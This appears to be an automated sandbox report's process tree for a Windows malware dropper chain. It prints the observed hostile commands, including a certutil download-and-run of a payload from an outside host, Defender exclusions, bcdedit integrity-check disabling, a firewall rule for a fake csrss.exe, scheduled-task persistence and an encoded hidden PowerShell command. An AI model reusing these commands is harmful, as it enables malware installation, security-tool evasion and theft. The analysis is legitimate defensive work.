C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt21⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\pwe2lb3o4c4\xw204n1ofqr.exe"C:\Users\Admin\AppData\Local\Temp\pwe2lb3o4c4\xw204n1ofqr.exe" /ustwo INSTALL16⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 64817⤵
- Drops file in Windows directory
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 66417⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 76417⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 80017⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 88017⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 95617⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4872 -s 108817⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\5vxvsbsxcne\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\5vxvsbsxcne\AwesomePoolU1.exe"16⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\bj3h1ou2qw4\vict.exe"C:\Users\Admin\AppData\Local\Temp\bj3h1ou2qw4\vict.exe" /VERYSILENT /id=53516⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-GMUTH.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-GMUTH.tmp\vict.tmp" /SL5="$30374,870426,780800,C:\Users\Admin\AppData\Local\Temp\bj3h1ou2qw4\vict.exe" /VERYSILENT /id=53517⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-N2JME.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-N2JME.tmp\wimapi.exe" 53518⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jjSCW2eoA.exe"C:\Users\Admin\AppData\Local\Temp\jjSCW2eoA.exe"19⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\jjSCW2eoA.exe"C:\Users\Admin\AppData\Local\Temp\jjSCW2eoA.exe"20⤵
- Executes dropped EXE
- Checks processor information in registry
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\43bouh4fhun\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\43bouh4fhun\askinstall24.exe"16⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe17⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe18⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5rxdndvzuj3\vpn.exe"C:\Users\Admin\AppData\Local\Temp\5rxdndvzuj3\vpn.exe" /silent /subid=48216⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-92BSA.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-92BSA.tmp\vpn.tmp" /SL5="$4032C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\5rxdndvzuj3\vpn.exe" /silent /subid=48217⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "18⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090119⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "18⤵
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090119⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies system certificate store
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall18⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install18⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1dradornysh\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\1dradornysh\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq16⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-2J4TE.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-2J4TE.tmp\IBInstaller_97039.tmp" /SL5="$30328,14597143,721408,C:\Users\Admin\AppData\Local\Temp\1dradornysh\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq17⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://janiboots.store/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=9703918⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Local\Temp\is-JAN82.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-JAN82.tmp\{app}\chrome_proxy.exe"18⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-JAN82.tmp\{app}\chrome_proxy.exe"19⤵
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 420⤵
- Runs ping.exe
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\r1ro5y1grzo\app.exe"C:\Users\Admin\AppData\Local\Temp\r1ro5y1grzo\app.exe" /8-2316⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Black-Haze"17⤵
-
-
C:\Program Files (x86)\Black-Haze\7za.exe"C:\Program Files (x86)\Black-Haze\7za.exe" e -p154.61.71.51 winamp-plugins.7z17⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Black-Haze\app.exe" -map "C:\Program Files (x86)\Black-Haze\WinmonProcessMonitor.sys""17⤵
-
C:\Program Files (x86)\Black-Haze\app.exe"C:\Program Files (x86)\Black-Haze\app.exe" -map "C:\Program Files (x86)\Black-Haze\WinmonProcessMonitor.sys"18⤵
- Suspicious behavior: LoadsDriver
-
-
-
C:\Program Files (x86)\Black-Haze\7za.exe"C:\Program Files (x86)\Black-Haze\7za.exe" e -p154.61.71.51 winamp.7z17⤵
-
-
C:\Program Files (x86)\Black-Haze\app.exe"C:\Program Files (x86)\Black-Haze\app.exe" /8-2317⤵
-
C:\Program Files (x86)\Black-Haze\app.exe"C:\Program Files (x86)\Black-Haze\app.exe" /8-2318⤵
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"19⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes20⤵
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /8-2319⤵
- Drops file in Drivers directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F20⤵
- Creates scheduled task(s)
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F20⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"20⤵
- Loads dropped DLL
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER21⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:21⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:21⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows21⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe21⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe21⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 021⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn21⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 121⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}21⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast21⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 021⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}21⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy21⤵
- Modifies boot configuration data using bcdedit
-
-
-
C:\Windows\System32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v20⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe20⤵
- Drops file in Drivers directory
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"20⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)21⤵
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)22⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exeC:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe20⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exeC:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe20⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe"C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe"21⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exeC:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe20⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe"C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe"21⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exeC:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe20⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe"C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe"21⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" http://humisnee.com/test.php?uuid=3da84874-5b8d-41cf-9b6d-93383f79a12d&browser=chrome22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffc40fa6e00,0x7ffc40fa6e10,0x7ffc40fa6e2023⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,3617537869483437240,7208223130852799994,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2724 /prefetch:123⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,3617537869483437240,7208223130852799994,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1688 /prefetch:123⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1628,3617537869483437240,7208223130852799994,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1692 /prefetch:823⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1628,3617537869483437240,7208223130852799994,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1644 /prefetch:223⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,3617537869483437240,7208223130852799994,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:123⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,3617537869483437240,7208223130852799994,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3624 /prefetch:123⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,3617537869483437240,7208223130852799994,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:123⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1628,3617537869483437240,7208223130852799994,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3488 /prefetch:123⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1628,3617537869483437240,7208223130852799994,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4240 /prefetch:823⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exeC:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exe20⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exeC:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exe20⤵
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\m672.exeC:\Users\Admin\AppData\Local\Temp\csrss\m672.exe20⤵
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\T4MAUD0HDD\setups.exe"C:\Users\Admin\AppData\Local\Temp\T4MAUD0HDD\setups.exe" ll13⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-3TBB0.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-3TBB0.tmp\setups.tmp" /SL5="$6014E,549376,61440,C:\Users\Admin\AppData\Local\Temp\T4MAUD0HDD\setups.exe" ll14⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5ac3n1xe.p5d\setup.exe /S /kr /site_id=754 & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\5ac3n1xe.p5d\setup.exeC:\Users\Admin\AppData\Local\Temp\5ac3n1xe.p5d\setup.exe /S /kr /site_id=75412⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"13⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&14⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3215⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6415⤵
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gZxBIsKhi" /SC once /ST 13:39:29 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="13⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gZxBIsKhi"13⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gZxBIsKhi"13⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWIRRaDZCpCYZHZEtf" /SC once /ST 16:36:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\rmwnDPC.exe\" nh /site_id 754 /S" /V1 /F13⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-J848Q.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-J848Q.tmp\hjjgaa.exe" /Verysilent5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
-
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{1534163d-60e4-2142-b852-ec1fe0a4c254}\oemvista.inf" "9" "4d14a44ff" "000000000000016C" "WinSta0\Default" "0000000000000168" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000016C"2⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Checks SCSI registry key(s)
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\rmwnDPC.exeC:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\rmwnDPC.exe nh /site_id 754 /S1⤵
- Drops file in System32 directory
-
